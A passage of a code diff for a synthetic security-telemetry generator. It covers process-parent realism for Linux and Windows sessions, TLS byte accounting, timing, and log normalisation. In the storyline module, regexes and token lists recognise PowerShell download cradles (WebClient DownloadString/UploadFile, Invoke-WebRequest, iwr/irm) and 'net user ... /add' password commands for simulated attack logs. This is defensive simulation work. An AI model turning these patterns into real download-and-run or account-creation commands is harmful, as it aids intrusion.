+            return self._ensure_system_connection_owner_process(
+                source_system=source_system,
+                time=time,
+                key=key,
+                image=owner_image,
+                command_line=owner_command_line,
+                username=owner_username,
+            )
+
         system_owner_spec = self._linux_proxy_helper_system_owner_spec(
             source_system=source_system,
             image=image,
@@ -8393,26 +8446,27 @@ class ActivityGenerator:
             self._emit_ocsp_http_response(event, cert_name=cert_name, ocsp=ocsp_ctx, rng=rng)
 
     @staticmethod
-    def _ensure_tls_conn_covers_certificate_bytes(event: SecurityEvent) -> None:
+    def _ensure_tls_conn_covers_certificate_bytes(event: SecurityEvent) -> bool:
         """Keep Zeek SSL certificate file evidence within the same conn budget."""
         net = event.network
         if net is None or not event.x509_chain:
-            return
+            return False
 
         from evidenceforge.generation.activity.tls_realism import (
             certificate_analyzer_delay_ms,
             certificate_file_size,
         )
 
+        changed = False
         cert_bytes = sum(certificate_file_size(cert) for cert in event.x509_chain)
         min_resp_bytes = cert_bytes + 280
         if (net.resp_bytes or 0) < min_resp_bytes:
             net.resp_bytes = min_resp_bytes
             if net.resp_pkts is not None:
                 net.resp_pkts = max(net.resp_pkts, max(1, (net.resp_bytes // 1460) + 1))
-            if net.resp_ip_bytes is not None:
-                packet_count = net.resp_pkts or max(1, (net.resp_bytes // 1460) + 1)
-                net.resp_ip_bytes = max(net.resp_ip_bytes, net.resp_bytes + (packet_count * 40))
+            packet_count = net.resp_pkts or max(1, (net.resp_bytes // 1460) + 1)
+            net.resp_ip_bytes = max(net.resp_ip_bytes or 0, net.resp_bytes + (packet_count * 40))
+            changed = True
 
         max_cert_delay = max(
             certificate_analyzer_delay_ms(
@@ -8429,6 +8483,8 @@ class ActivityGenerator:
         min_duration = max(min_duration, 1.05 + (0.075 * len(event.x509_chain)))
         if net.duration is None or net.duration < min_duration:
             net.duration = min_duration
+            changed = True
+        return changed
 
     def _emit_ocsp_http_response(
         self,
@@ -10992,6 +11048,29 @@ class ActivityGenerator:
                 ):
                     running_proc.last_activity_time = time
             return singleton_pid
+
+        if (
+            _get_os_category(system.os) == "windows"
+            and explicit_parent is not None
+            and ntpath.basename(explicit_parent.image).lower() == "services.exe"
+        ):
+            singleton_service_pid = self._existing_windows_singleton_service_pid(
+                system=system,
+                process_name=process_name,
+                time=time,
+                username=process_username,
+            )
+            if singleton_service_pid is not None:
+                running_proc = self.state_manager.get_process(
+                    system.hostname, singleton_service_pid
+                )
+                if running_proc is not None:
+                    self.state_manager.update_process_activity_time(
+                        system.hostname,
+                        singleton_service_pid,
+                        time,
+                    )
+                return singleton_service_pid
 
         if not from_storyline:
             persistent_app_pid = self._existing_persistent_user_app_pid(
@@ -18755,6 +18834,28 @@ class ActivityGenerator:
                 event.network.orig_bytes or 0,
                 event.network.resp_bytes or 0,
             )
+        if self._ensure_tls_conn_covers_certificate_bytes(event):
+            close_time = (
+                event.timestamp + timedelta(seconds=max(0.0, event.network.duration or 0.0))
+                if event.network.duration is not None
+                else None
+            )
+            self.state_manager.update_connection_interval(
+                event.network.conn_id,
+                event.timestamp,
+                close_time,
+            )
+            self.state_manager.update_connection_bytes(
+                event.network.conn_id,
+                event.network.orig_bytes or 0,
+                event.network.resp_bytes or 0,
+            )
+            if pid > 0 and resolved_source_system is not None:
+                self._remember_process_connection_hold(
+                    system=resolved_source_system,
+                    pid=pid,
+                    close_time=close_time,
+                )
 
         self._repair_explicit_proxy_listener_process_attribution(
             event,
@@ -19125,6 +19226,109 @@ class ActivityGenerator:
             return None
         return transport_pid
 
+    def _active_linux_session_user_manager_pid(
+        self,
+        *,
+        user: User,
+        target_system: System,
+        logon_id: str,
+        at_time: datetime,
+    ) -> int | None:
+        """Return the durable `systemd --user` process for a local Linux session."""
+
+        at_time = ensure_utc(at_time)
+        session = self.state_manager.get_session(logon_id)
+        candidate_pids: list[int] = []
+        if session is not None and session.session_user_manager_pid:
+            candidate_pids.append(session.session_user_manager_pid)
+
+        for proc in self.state_manager.get_processes_on_system(target_system.hostname):
+            if proc.username != user.username:
+                continue
+            if proc.logon_id != logon_id:
+                continue
+            if proc.image != "/usr/lib/systemd/systemd":
+                continue
+            if proc.command_line != "/usr/lib/systemd/systemd --user":
+                continue
+            candidate_pids.append(proc.pid)
+
+        valid_candidates = []
+        for pid in dict.fromkeys(candidate_pids):
+            proc = self.state_manager.get_process(target_system.hostname, pid)
+            if proc is None or proc.start_time is None:
+                continue
+            if ensure_utc(proc.start_time) > at_time:
+                continue
+            if not self._is_pid_active_at(target_system, pid, at_time):
+                continue
+            valid_candidates.append(proc)
+
+        if not valid_candidates:
+            return None
+
+        valid_candidates.sort(key=lambda proc: ensure_utc(proc.start_time))
+        user_manager = valid_candidates[0]
+        if session is not None:
+            session.session_user_manager_pid = user_manager.pid
+        return user_manager.pid
+
+    def _active_linux_local_session_parent_pid(
+        self,
+        *,
+        user: User,
+        target_system: System,
+        logon_id: str,
+        at_time: datetime,
+    ) -> int | None:
+        """Return an active terminal/login parent for a local Linux session shell."""
+
+        at_time = ensure_utc(at_time)
+        session = self.state_manager.get_session(logon_id)
+        candidate_pids: list[int] = []
+        if session is not None and session.process_tree_root:
+            candidate_pids.append(session.process_tree_root)
+
+        parent_images = {
+            "/usr/libexec/gnome-terminal-server",
+            "/bin/login",
+        }
+        for proc in self.state_manager.get_processes_on_system(target_system.hostname):
+            if proc.username != user.username:
+                continue
+            if proc.logon_id != logon_id:
+                continue
+            if proc.image not in parent_images:
+                continue
+            candidate_pids.append(proc.pid)
+
+        valid_candidates = []
+        for pid in dict.fromkeys(candidate_pids):
+            proc = self.state_manager.get_process(target_system.hostname, pid)
+            if proc is None or proc.start_time is None:
+                continue
+            if proc.image not in parent_images:
+                continue
+            if ensure_utc(proc.start_time) > at_time:
+                continue
+            if not self._linux_parent_usable_for_child_at(
+                system=target_system,
+                parent_pid=pid,
+                time=at_time,
+                logon_id=logon_id,
+            ):
+                continue
+            valid_candidates.append(proc)
+
+        if not valid_candidates:
+            return None
+
+        valid_candidates.sort(key=lambda proc: ensure_utc(proc.start_time), reverse=True)
+        parent = valid_candidates[0]
+        if session is not None:
+            session.process_tree_root = parent.pid
+        return parent.pid
+
     def _ensure_linux_local_session_shell_parent(
         self,
         *,
@@ -19150,18 +19354,32 @@ class ActivityGenerator:
         if user_systemd_time >= bash_time:
             user_systemd_time = logon_time + timedelta(milliseconds=90)
 
-        user_systemd_pid = self.generate_process(
+        session = self.state_manager.get_session(logon_id)
+        user_systemd_pid = self._active_linux_session_user_manager_pid(
             user=user,
-            system=target_system,
-            time=user_systemd_time,
+            target_system=target_system,
             logon_id=logon_id,
-            process_name="/usr/lib/systemd/systemd",
-            command_line="/usr/lib/systemd/systemd --user",
-            parent_pid=root_parent_pid,
-            suppress_command_file_effect=True,
+            at_time=bash_time,
         )
-        user_systemd_proc = self.state_manager.get_process(target_system.hostname, user_systemd_pid)
-        if user_systemd_proc is not None:
+        if user_systemd_pid is None:
+            user_systemd_pid = self.generate_process(
+                user=user,
+                system=target_system,
+                time=user_systemd_time,
+                logon_id=logon_id,
+                process_name="/usr/lib/systemd/systemd",
+                command_line="/usr/lib/systemd/systemd --user",
+                parent_pid=root_parent_pid,
+                suppress_command_file_effect=True,
+            )
+            if session is not None:
+                session.session_user_manager_pid = user_systemd_pid
+
+        user_systemd_proc = self.state_manager.get_process(
+            target_system.hostname,
+            user_systemd_pid,
+        )
+        if user_systemd_proc is not None and user_systemd_proc.start_time is not None:
             user_systemd_time = ensure_utc(user_systemd_proc.start_time)
 
         if workstation_like:
@@ -19170,6 +19388,21 @@ class ActivityGenerator:
         else:
             parent_image = "/bin/login"
             parent_command = f"login -- {user.username}"
+
+        existing_parent_pid = self._active_linux_local_session_parent_pid(
+            user=user,
+            target_system=target_system,
+            logon_id=logon_id,
+            at_time=bash_time,
+        )
+        if existing_parent_pid is not None:
+            existing_parent = self.state_manager.get_process(
+                target_system.hostname,
+                existing_parent_pid,
+            )
+            if existing_parent is not None and existing_parent.start_time is not None:
+                return existing_parent_pid, ensure_utc(existing_parent.start_time)
+            return existing_parent_pid, user_systemd_time
 
         terminal_time = max(
             user_systemd_time + timedelta(milliseconds=120),
@@ -19353,6 +19586,16 @@ class ActivityGenerator:
                 margin_seconds=1.5,
             ):
                 return None
+            if session is not None and session.system == target_system.hostname:
+                session_shell = self.ensure_linux_session_shell(
+                    user=user,
+                    target_system=target_system,
+                    logon_id=logon_id,
+                    logon_time=logon_time or session.start_time,
+                    activity_time=activity_time,
+                )
+                if session_shell is not None:
+                    return session_shell
         existing = self._active_visible_linux_shell_pid(
             target_system,
             user.username,
@@ -25994,22 +26237,29 @@ class ActivityGenerator:
 
         normalized_path = ntpath.normpath(process_name.replace("/", "\\")).lower()
         exe_name = normalized_path.rsplit("\\", 1)[-1]
-        if exe_name not in _WINDOWS_SINGLETON_SERVICE_EXES:
+        from evidenceforge.generation.activity.system_processes import (
+            get_windows_singleton_service_paths,
+        )
+
+        singleton_paths = {
+            key: set(paths) for key, paths in _WINDOWS_SINGLETON_SERVICE_PATHS.items()
+        }
+        for key, paths in get_windows_singleton_service_paths().items():
+            singleton_paths.setdefault(key, set()).update(paths)
+        valid_paths = singleton_paths.get(exe_name)
+        if not valid_paths:
             return None
 
-        canonical_path = f"c:\\windows\\system32\\{exe_name}"
-        if "\\" in normalized_path and normalized_path != canonical_path:
+        if "\\" in normalized_path and normalized_path not in valid_paths:
             return None
 
         normalized_username = username.upper()
         candidates: list[RunningProcess] = []
         for proc in self.state_manager.get_processes_on_system(system.hostname):
             proc_path = ntpath.normpath(proc.image.replace("/", "\\")).lower()
-            if proc_path != canonical_path:
+            if proc_path not in valid_paths:
                 continue
             if proc.username.upper() != normalized_username:
-                continue
-            if proc.start_time > time:
                 continue
             parent = self.state_manager.get_process(system.hostname, proc.parent_pid)
             parent_image = parent.image if parent else ""
@@ -26138,6 +26388,82 @@ class ActivityGenerator:
         if proc is None:
             return False
         return self._is_one_shot_shell_command(proc.image, proc.command_line)
+
+    @staticmethod
+    def _windows_one_shot_shell_payload(process_name: str, command_line: str) -> str:
+        """Return the inline command executed by a one-shot Windows shell."""
+        shell_exe = process_name.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
+        command = command_line.strip()
+        if shell_exe == "cmd.exe":
+            match = re.search(r"(?i)(?:^|\s)/(?:c|k)\s+(.+)$", command)
+            return match.group(1).strip().strip('"') if match else ""
+        if shell_exe in {"powershell.exe", "pwsh.exe"}:
+            match = re.search(r"(?i)(?:^|\s)-(?:command|c)\s+(.+)$", command)
+            return match.group(1).strip().strip('"') if match else ""
+        return ""
+
+    @staticmethod
+    def _windows_shell_command_signature(command_line: str) -> tuple[str, ...]:
+        """Normalize a Windows command line for shell parent/child matching."""
+        tokens = _command_tokens(command_line)
+        if not tokens:
+            return ()
+        normalized: list[str] = []
+        for index, token in enumerate(tokens):
+            value = token.strip().strip('"').lower()
+            if index == 0:
+                value = value.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
+                if value.endswith(".exe"):
+                    value = value[:-4]
+            normalized.append(value)
+        return tuple(normalized)
+
+    @classmethod
+    def _windows_child_command_signatures(
+        cls,
+        process_name: str,
+        command_line: str,
+    ) -> set[tuple[str, ...]]:
+        """Return command signatures that can represent a child process launch."""
+        process_exe = process_name.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
+        process_stem = process_exe.removesuffix(".exe")
+        signatures: set[tuple[str, ...]] = set()
+        command_signature = cls._windows_shell_command_signature(command_line)
+        if command_signature:
+            signatures.add(command_signature)
+            if command_signature[0] != process_stem:
+                signatures.add((process_stem, *command_signature))
+        else:
+            signatures.add((process_stem,))
+        return signatures
+
+    def _windows_shell_parent_invokes_child(
+        self,
+        *,
+        system: System,
+        parent_pid: int,
+        process_name: str,
+        command_line: str,
+    ) -> bool:
+        """Return whether a one-shot shell parent directly invokes this child command."""
+        parent_proc = self.state_manager.get_process(system.hostname, parent_pid)
+        if parent_proc is None:
+            return False
+        if not self._is_one_shot_shell_command(parent_proc.image, parent_proc.command_line):
+            return False
+        payload = self._windows_one_shot_shell_payload(
+            parent_proc.image,
+            parent_proc.command_line,
+        )
+        if not payload:
+            return False
+        parent_signature = self._windows_shell_command_signature(payload)
+        if not parent_signature:
+            return False
+        return parent_signature in self._windows_child_command_signatures(
+            process_name,
+            command_line,
+        )
 
     def _is_bare_interactive_windows_shell(self, process_name: str, command_line: str) -> bool:
         """Return whether a shell is an interactive prompt rather than an inline command."""
@@ -27307,6 +27633,15 @@ class ActivityGenerator:
             return self._windows_explorer_parent_pid(system, user, time, logon_id)
 
         if os_category == "windows":
+            parent_is_one_shot_shell = self._is_one_shot_shell_parent(system, parent_pid)
+            one_shot_parent_invokes_child = parent_is_one_shot_shell and (
+                self._windows_shell_parent_invokes_child(
+                    system=system,
+                    parent_pid=parent_pid,
+                    process_name=process_name,
+                    command_line=command_line,
+                )
+            )
             if is_same_exe_gui_child:
                 same_exe_parent = self._windows_same_exe_gui_parent_pid(
                     system=system,
@@ -27335,7 +27670,7 @@ class ActivityGenerator:
                     logon_id=logon_id,
                     os_category=os_category,
                 )
-                and not self._is_one_shot_shell_parent(system, parent_pid)
+                and (not parent_is_one_shot_shell or one_shot_parent_invokes_child)
             ):
                 return parent_pid
         elif parent_proc is not None and self._linux_parent_usable_for_child_at(
@@ -27368,7 +27703,14 @@ class ActivityGenerator:
                     return visible_shell_pid
             return parent_pid
 
-        resolved = self._resolve_parent(system, user, time, logon_id, process_name)
+        resolved = self._resolve_parent(
+            system,
+            user,
+            time,
+            logon_id,
+            process_name,
+            command_line,
+        )
         resolved_proc = self.state_manager.get_process(system.hostname, resolved)
         resolved_image = (resolved_proc.image if resolved_proc is not None else "").lower()
         if os_category == "windows":

--- a/src/evidenceforge/generation/activity/system_processes.py
+++ b/src/evidenceforge/generation/activity/system_processes.py
@@ -39,6 +39,7 @@ def load_system_processes() -> dict[str, Any]:
 
 _CACHED_BINARY_EXES: set[str] | None = None
 _CACHED_BINARY_PATHS: dict[str, str] | None = None
+_CACHED_SINGLETON_SERVICE_PATHS: dict[str, set[str]] | None = None
 
 
 def get_system_binary_exes() -> set[str]:
@@ -99,6 +100,35 @@ def get_system_binary_path(
     if path:
         path = _resolve_host_placeholders(path, host)
     return path
+
+
+def get_windows_singleton_service_paths() -> dict[str, set[str]]:
+    """Return Windows service-process paths that should be singleton per host.
+
+    The keys and path values are normalized to lowercase backslash paths. Entries
+    are driven by ``system_services`` records with ``singleton: true`` so
+    endpoint-agent lifecycle policy stays with the service catalog.
+    """
+    global _CACHED_SINGLETON_SERVICE_PATHS
+    if _CACHED_SINGLETON_SERVICE_PATHS is not None:
+        return _CACHED_SINGLETON_SERVICE_PATHS
+
+    data = load_system_processes()
+    singleton_paths: dict[str, set[str]] = {}
+    for entries in data.get("system_services", {}).values():
+        if not isinstance(entries, list):
+            continue
+        for entry in entries:
+            if not isinstance(entry, dict) or not entry.get("singleton"):
+                continue
+            image = str(entry.get("image") or "").replace("/", "\\").lower()
+            if not image:
+                continue
+            exe_name = image.rsplit("\\", 1)[-1]
+            singleton_paths.setdefault(exe_name, set()).add(image)
+
+    _CACHED_SINGLETON_SERVICE_PATHS = singleton_paths
+    return singleton_paths
 
 
 def _resolve_template(template: str, rng: random.Random, entry_params: dict | None) -> str:

--- a/src/evidenceforge/generation/emitters/ecar.py
+++ b/src/evidenceforge/generation/emitters/ecar.py
@@ -1963,6 +1963,8 @@ class EcarEmitter(HostMultiplexEmitter):
             props = record.get("properties") or {}
             if str(props.get("outcome") or "success") == "failure":
                 continue
+            if str(props.get("logon_type") or "") == "7":
+                continue
             logon_id = str(props.get("logon_id") or "")
             if not logon_id:
                 continue
@@ -2799,6 +2801,40 @@ class EcarEmitter(HostMultiplexEmitter):
                 normalized.append(json.dumps(record, separators=(",", ":")))
         return normalized
 
+    @classmethod
+    def _normalize_flow_process_actor_visibility(cls, lines: list[str]) -> list[str]:
+        """Drop FLOW process actors that are not source-visible in the host stream."""
+        records: list[dict[str, Any] | None] = []
+        visible_process_ids: set[str] = set()
+        for line in lines:
+            try:
+                record = json.loads(line)
+            except json.JSONDecodeError:
+                records.append(None)
+                continue
+            records.append(record)
+            if record.get("object") != "PROCESS" or record.get("action") != "CREATE":
+                continue
+            object_id = str(record.get("objectID") or "")
+            if object_id:
+                visible_process_ids.add(object_id)
+
+        normalized: list[str] = []
+        for line, record in zip(lines, records, strict=True):
+            if record is None:
+                normalized.append(line)
+                continue
+            if record.get("object") != "FLOW" or record.get("action") != "CONNECT":
+                normalized.append(line)
+                continue
+            actor_id = str(record.get("actorID") or "")
+            if actor_id and actor_id not in visible_process_ids:
+                cls._drop_flow_process_identity(record)
+                normalized.append(json.dumps(record, separators=(",", ":")))
+                continue
+            normalized.append(line)
+        return normalized
+
     @staticmethod
     def _drop_flow_process_identity(record: dict[str, Any]) -> None:
         """Remove process attribution from a FLOW that cannot safely claim it."""
@@ -2895,6 +2931,8 @@ class EcarEmitter(HostMultiplexEmitter):
                         writer.buffer,
                         self._output_end_time,
                     )
+                    writer.buffer = self._normalize_flow_process_actor_visibility(writer.buffer)
+                    writer.buffer = self._deduplicate_semantic_events(writer.buffer)
                     writer.buffer = self._strip_internal_fields(writer.buffer)
         super().flush(force=force)
 

--- a/src/evidenceforge/generation/engine/baseline.py
+++ b/src/evidenceforge/generation/engine/baseline.py
@@ -770,6 +770,17 @@ def _windows_stale_process_target_lifetime(
     )
 
 
+def _is_windows_singleton_service_image(image: str) -> bool:
+    """Return whether an image is a configured singleton Windows service."""
+    from evidenceforge.generation.activity.system_processes import (
+        get_windows_singleton_service_paths,
+    )
+
+    normalized = image.replace("/", "\\").lower()
+    exe_name = normalized.rsplit("\\", 1)[-1]
+    return normalized in get_windows_singleton_service_paths().get(exe_name, set())
+
+
 def _kernel_uptime_stamp(boot_uptime: float, scenario_start: datetime, timestamp: datetime) -> str:
     """Return source-native kernel monotonic uptime for a syslog timestamp."""
     event_time = timestamp if timestamp.tzinfo is not None else timestamp.replace(tzinfo=UTC)
@@ -4625,6 +4636,10 @@ class BaselineMixin:
 
                 # Never terminate seeded system processes (pattern match + PID safety net)
                 if any(p in image_lower for p in system_patterns):
+                    continue
+                if _get_os_category(system.os) == "windows" and _is_windows_singleton_service_image(
+                    proc.image
+                ):
                     continue
                 if proc.pid in protected_pids:
                     continue

--- a/src/evidenceforge/generation/engine/storyline.py
+++ b/src/evidenceforge/generation/engine/storyline.py
@@ -86,6 +86,31 @@ logger = logging.getLogger(__name__)
 _MAX_EMBEDDED_COMMAND_B64_CHARS = 16_384
 _STORYLINE_SHELL_TEMPLATE_FORMATTER = string.Formatter()
 _IPV4_LITERAL_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
+_POWERSHELL_WEB_CMDLET_USER_AGENT = (
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WindowsPowerShell/5.1"
+)
+_HTTP_USER_AGENT_OVERRIDE_PATTERNS = (
+    re.compile(
+        r"""(?ix)
+        \B-useragent
+        \s+
+        (?P<quote>['"])
+        (?P<value>[^'"]+)
+        (?P=quote)
+        """
+    ),
+    re.compile(
+        r"""(?ix)
+        user-agent
+        ["'\]\s]*
+        (?:,|=|=>)
+        \s*
+        (?P<quote>['"])
+        (?P<value>[^'"]+)
+        (?P=quote)
+        """
+    ),
+)
 _NET_USER_ADD_WITH_PASSWORD_RE = re.compile(
     r"\bnet1?\s+user\s+(?P<username>\S+)\s+(?P<password>\S+)\s+/add\b",
     re.IGNORECASE,
@@ -1563,6 +1588,28 @@ class StorylineMixin:
             self._storyline_host_available_at.get(key, available_at),
         )
 
+    def _record_storyline_session_ready(
+        self,
+        *,
+        system: System,
+        actor: User,
+        session: Any,
+        rng: random.Random,
+    ) -> None:
+        """Delay follow-on same-host commands until a remote session is usable."""
+        ready_time = getattr(session, "source_ready_time", None) or getattr(
+            session,
+            "start_time",
+            None,
+        )
+        if isinstance(ready_time, datetime):
+            self._record_storyline_host_available_after(
+                system=system,
+                actor=actor,
+                time=ready_time,
+                rng=rng,
+            )
+
     def _emit_storyline_account_password_followups(
         self,
         actor: User,
@@ -2113,6 +2160,93 @@ class StorylineMixin:
         )
 
         return browser_user_agent_for_process(rng, system, image)
+
+    @staticmethod
+    def _storyline_http_user_agent_for_command(
+        *,
+        system: System | None,
+        process_image: str | None,
+        command_line: str,
+        rng: random.Random,
+    ) -> str:
+        """Return source-native HTTP User-Agent metadata for command-derived HTTP."""
+        user_agent, _ = StorylineMixin._storyline_http_user_agent_metadata_for_command(
+            system=system,
+            process_image=process_image,
+            command_line=command_line,
+            rng=rng,
+        )
+        return user_agent
+
+    @staticmethod
+    def _storyline_http_user_agent_metadata_for_command(
+        *,
+        system: System | None,
+        process_image: str | None,
+        command_line: str,
+        rng: random.Random,
+    ) -> tuple[str, bool]:
+        """Return User-Agent and whether its absence is source-native-known."""
+        explicit_user_agent = StorylineMixin._explicit_http_user_agent_from_command(command_line)
+        if explicit_user_agent is not None:
+            return explicit_user_agent, False
+        if StorylineMixin._command_uses_dotnet_webclient(command_line):
+            return "", True
+        if StorylineMixin._command_uses_powershell_web_cmdlet(command_line):
+            return _POWERSHELL_WEB_CMDLET_USER_AGENT, False
+        return (
+            StorylineMixin._storyline_http_user_agent_for_process(
+                system=system,
+                process_image=process_image,
+                command_line=command_line,
+                rng=rng,
+            ),
+            False,
+        )
+
+    @staticmethod
+    def _explicit_http_user_agent_from_command(command_line: str) -> str | None:
+        """Extract an explicit User-Agent override from raw or decoded command text."""
+        for text in StorylineMixin._http_url_search_texts(command_line):
+            for pattern in _HTTP_USER_AGENT_OVERRIDE_PATTERNS:
+                match = pattern.search(text)
+                if match is None:
+                    continue
+                value = match.group("value").strip()
+                if value:
+                    return value
+        return None
+
+    @staticmethod
+    def _command_uses_dotnet_webclient(command_line: str) -> bool:
+        """Return true for raw System.Net.WebClient download commands."""
+        for text in StorylineMixin._http_url_search_texts(command_line):
+            lowered = text.lower()
+            if "webclient" not in lowered:
+                continue
+            if any(
+                token in lowered
+                for token in (
+                    ".downloadstring",
+                    ".downloadfile",
+                    ".openread",
+                    ".uploaddata",
+                    ".uploadfile",
+                )
+            ):
+                return True
+        return False
+
+    @staticmethod
+    def _command_uses_powershell_web_cmdlet(command_line: str) -> bool:
+        """Return true for PowerShell web cmdlets that set a native default UA."""
+        for text in StorylineMixin._http_url_search_texts(command_line):
+            lowered = text.lower()
+            if "invoke-webrequest" in lowered or "invoke-restmethod" in lowered:
+                return True
+            if re.search(r"(?i)\b(?:iwr|irm)\b", text):
+                return True
+        return False
 
     def _emit_storyline_archive_transfer_before_exfil(
         self,
@@ -3182,6 +3316,14 @@ class StorylineMixin:
                         network_time=time + timedelta(milliseconds=rng.randint(250, 900)),
                         rng=rng,
                     )
+                    http_user_agent, http_user_agent_known_absent = (
+                        self._storyline_http_user_agent_metadata_for_command(
+                            system=system,
+                            process_image=process_name,
+                            command_line=command_line,
+                            rng=rng,
+                        )
+                    )
                     self.activity_generator.generate_connection(
                         src_ip=system.ip,
                         dst_ip=dst_ip,
@@ -3204,7 +3346,8 @@ class StorylineMixin:
                             host=hostname,
                             uri=uri,
                             version="1.1",
-                            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) PowerShell/5.1",
+                            user_agent=http_user_agent,
+                            user_agent_known_absent=http_user_agent_known_absent,
                             request_body_len=0,
                             response_body_len=response_body_len,
                             status_code=200,
@@ -3750,6 +3893,12 @@ class StorylineMixin:
                     result.session.logon_id,
                     source_ip=result.session.source_ip,
                 )
+                self._record_storyline_session_ready(
+                    system=target,
+                    actor=actor,
+                    session=result.session,
+                    rng=rng,
+                )
             malicious_event["dst_ip"] = system.ip
             malicious_event["dst_port"] = 22
             result_source_ip = (
@@ -3795,6 +3944,18 @@ class StorylineMixin:
                 result = SimpleNamespace(network_uid=uid)
             if getattr(result, "session", None) is not None:
                 malicious_event["actor"] = result.session.username
+                self._record_storyline_logon(
+                    actor,
+                    target,
+                    result.session.logon_id,
+                    source_ip=result.session.source_ip,
+                )
+                self._record_storyline_session_ready(
+                    system=target,
+                    actor=actor,
+                    session=result.session,
+                    rng=rng,
+                )
             malicious_event["dst_ip"] = system.ip
             malicious_event["dst_port"] = 3389
             result_source_ip = (

--- a/src/evidenceforge/generation/source_timing.py
+++ b/src/evidenceforge/generation/source_timing.py
@@ -28,6 +28,11 @@ if TYPE_CHECKING:
 
 _SOURCE_EPSILON = timedelta(milliseconds=1)
 _OBSERVATION_NOISE_US = 997
+_PROCESS_CREATE_SOURCE_KEYS = {
+    "source.windows_security_process_create",
+    "source.sysmon_process_create",
+    "source.ecar_process_create",
+}
 
 
 @dataclass(slots=True)
@@ -72,6 +77,12 @@ class SourceTimingPlanner:
         preferred_time = plan.source_times.get(cache_key)
         if preferred_time is None:
             preferred_time = self._sample_source_time(event, source_key, effective_seed)
+        if not_before is not None and preferred_time < not_before:
+            preferred_time = self._source_floor_repair_time(
+                source_key,
+                effective_seed,
+                not_before,
+            )
         constrained_time = self._apply_constraints(
             preferred_time,
             not_before=not_before,
@@ -334,6 +345,21 @@ class SourceTimingPlanner:
             "source-micro-noise:" + source_key + ":" + ":".join(str(part) for part in seed_parts)
         )
         return timedelta(microseconds=37 + (seed % 961))
+
+    @staticmethod
+    def _source_floor_repair_time(
+        source_key: str,
+        seed_parts: tuple[Any, ...],
+        lower_bound: datetime,
+    ) -> datetime:
+        """Keep clamped process-create sources source-native after a shared floor."""
+        if source_key not in _PROCESS_CREATE_SOURCE_KEYS:
+            return lower_bound
+        delay = sample_timing_delta(
+            source_key,
+            seed_parts=("floor-repair", source_key, *seed_parts),
+        )
+        return lower_bound + max(delay, _SOURCE_EPSILON)
 
     @staticmethod
     def _apply_constraints(

--- a/src/evidenceforge/generation/state_manager.py
+++ b/src/evidenceforge/generation/state_manager.py
@@ -1182,6 +1182,8 @@ class StateManager:
                 continue
             if session.explorer_pid == pid:
                 session.explorer_pid = None
+            if session.session_user_manager_pid == pid:
+                session.session_user_manager_pid = None
             if session.session_winlogon_pid == pid:
                 session.session_winlogon_pid = None
             if session.session_shell_pid == pid:

--- a/src/evidenceforge/models/state.py
+++ b/src/evidenceforge/models/state.py
@@ -65,6 +65,7 @@ class ActiveSession:
     session_id: int = 0
     explorer_pid: int | None = None
     session_shell_pid: int | None = None  # Linux: per-session bash login shell
+    session_user_manager_pid: int | None = None  # Linux: per-session systemd --user
     session_winlogon_pid: int | None = None  # Windows: per-RDP-session winlogon
     process_tree_root: int | None = None
     last_activity_time: datetime | None = None

--- a/tests/unit/test_activity.py
+++ b/tests/unit/test_activity.py
@@ -10011,10 +10011,84 @@ class TestActivityGenerator:
         assert release_time == source_visible_done
         assert reserved > source_visible_done
 
-    def test_linux_proxy_client_process_uses_non_shell_session_parent(
+    def test_linux_session_shell_reuses_user_manager_when_rebuilt(
         self, activity_gen, test_user, state_manager
     ):
-        """Synthetic Linux proxy socket owners should not occupy the foreground shell."""
+        """Rebuilding a local Linux shell should not duplicate `systemd --user`."""
+        session_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=UTC)
+        linux = System(
+            hostname="WS-LNGUYEN-01",
+            ip="10.0.2.60",
+            os="Ubuntu 22.04",
+            type="workstation",
+            assigned_user=test_user.username,
+        )
+        state_manager.set_current_time(session_time)
+        systemd_pid = state_manager.create_process(
+            linux.hostname,
+            0,
+            "/usr/lib/systemd/systemd",
+            "/usr/lib/systemd/systemd --system",
+            "root",
+            "System",
+        )
+        logon_id = state_manager.create_session(
+            username=test_user.username,
+            system=linux.hostname,
+            logon_type=2,
+            source_ip="-",
+            session_kind="interactive",
+            start_time=session_time,
+        )
+        activity_gen._users_by_username = {test_user.username: test_user}
+        activity_gen._system_pids = {linux.hostname: {"systemd": systemd_pid}}
+
+        first_shell = activity_gen.ensure_linux_session_shell(
+            user=test_user,
+            target_system=linux,
+            logon_id=logon_id,
+            logon_time=session_time,
+            activity_time=session_time + timedelta(minutes=5),
+        )
+
+        assert first_shell is not None
+        first_shell_proc = state_manager.get_process(linux.hostname, first_shell)
+        assert first_shell_proc is not None
+        first_terminal = state_manager.get_process(linux.hostname, first_shell_proc.parent_pid)
+        assert first_terminal is not None
+        first_user_manager_pid = first_terminal.parent_pid
+        first_user_manager = state_manager.get_process(linux.hostname, first_user_manager_pid)
+        assert first_user_manager is not None
+        assert first_user_manager.command_line == "/usr/lib/systemd/systemd --user"
+
+        state_manager.end_process(linux.hostname, first_shell)
+        state_manager.end_process(linux.hostname, first_terminal.pid)
+
+        second_shell = activity_gen.ensure_linux_session_shell(
+            user=test_user,
+            target_system=linux,
+            logon_id=logon_id,
+            logon_time=session_time,
+            activity_time=session_time + timedelta(minutes=35),
+        )
+
+        assert second_shell is not None
+        second_shell_proc = state_manager.get_process(linux.hostname, second_shell)
+        assert second_shell_proc is not None
+        second_terminal = state_manager.get_process(linux.hostname, second_shell_proc.parent_pid)
+        assert second_terminal is not None
+        assert second_terminal.parent_pid == first_user_manager_pid
+        user_managers = [
+            proc
+            for proc in state_manager.get_processes_on_system(linux.hostname)
+            if proc.command_line == "/usr/lib/systemd/systemd --user" and proc.logon_id == logon_id
+        ]
+        assert len(user_managers) == 1
+
+    def test_linux_workstation_python_requests_proxy_stays_unattributed(
+        self, activity_gen, test_user, state_manager
+    ):
+        """Generic Python proxy User-Agents should not synthesize desktop snippets."""
         request_time = datetime(2024, 1, 15, 10, 5, 0, tzinfo=UTC)
         linux = System(
             hostname="WS-LNGUYEN-01",
@@ -10099,11 +10173,16 @@ class TestActivityGenerator:
             dst_port=443,
         )
 
-        proc = state_manager.get_process(linux.hostname, pid)
-        assert image == "/usr/bin/python3"
-        assert proc is not None
